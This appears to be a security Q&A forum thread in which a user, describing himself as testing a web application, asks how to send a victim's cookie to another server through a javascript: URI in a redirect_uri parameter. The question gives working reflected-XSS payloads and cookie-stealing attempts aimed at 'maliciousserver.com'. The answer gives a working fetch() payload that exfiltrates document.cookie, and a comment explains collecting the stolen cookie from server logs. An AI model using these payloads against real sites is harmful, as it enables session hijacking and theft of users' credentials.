# Exploit: Send cookie to another server from url

Tags: xss, reflected-xss

I'm testing a web application and found that url contains "redirect=" where it navigates to new location once logged in.

`http://IPAddress/?redirect_uri=test`

I'm trying to exploit the cookie using redirect_uri as the HTTPOnly & Secure flags are not set.

I've trying different payloads and successfully exploited using following payload

`http://IPAddress/?redirect_uri=javascript:alert(document.cookie)`

Now i want to transfer the payload to another malicious server, for that I've tried following payloads, but nothing works.

`http://IPAddress/?redirect_uri=javascript:document.location.href="http://maliciousserver.com/anyfile.php?cookie=" + document.cookie`

The above payload not even send request to the malicious server, whereas the HTTP request was received for the following payload

`http://IPAddress/?redirect_uri=javascript:document.location.href="http://maliciousserver.com/anyfile.php?cookie="`

Could some one help me to transfer the cookie using `redirect_uri=javascript:` payload to another server?

P.S - `<script> </script>` tags are not executed as the x-xss-protection header is enabled.

Answer (score 1):

The simplest way would be to use [the `fetch()` method](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/fetch).

```
?redirect_uri=javascript:fetch("https://example.com/"+document.cookie)
```

Comment: Fetch method doesn't worked out and redirection doesn't work with open & close brackets. `javascript:fetch="https://example.com/"` executes and displayed it in the page itself but not redirected to target page. I can't pass document.cookie to target page.

Comment: The `fetch` method is not supposed to redirect to the endpoint, but rather send an HTTP request to your server with the cookie. Then you can extract the cookie from your logs.

If you replace `https://example.com/` in http://output.jsbin.com/zugeruvige?xss=javascript:fetch("https://example.com/"+document.cookie) with your host, you should see the document's cookie in your logs.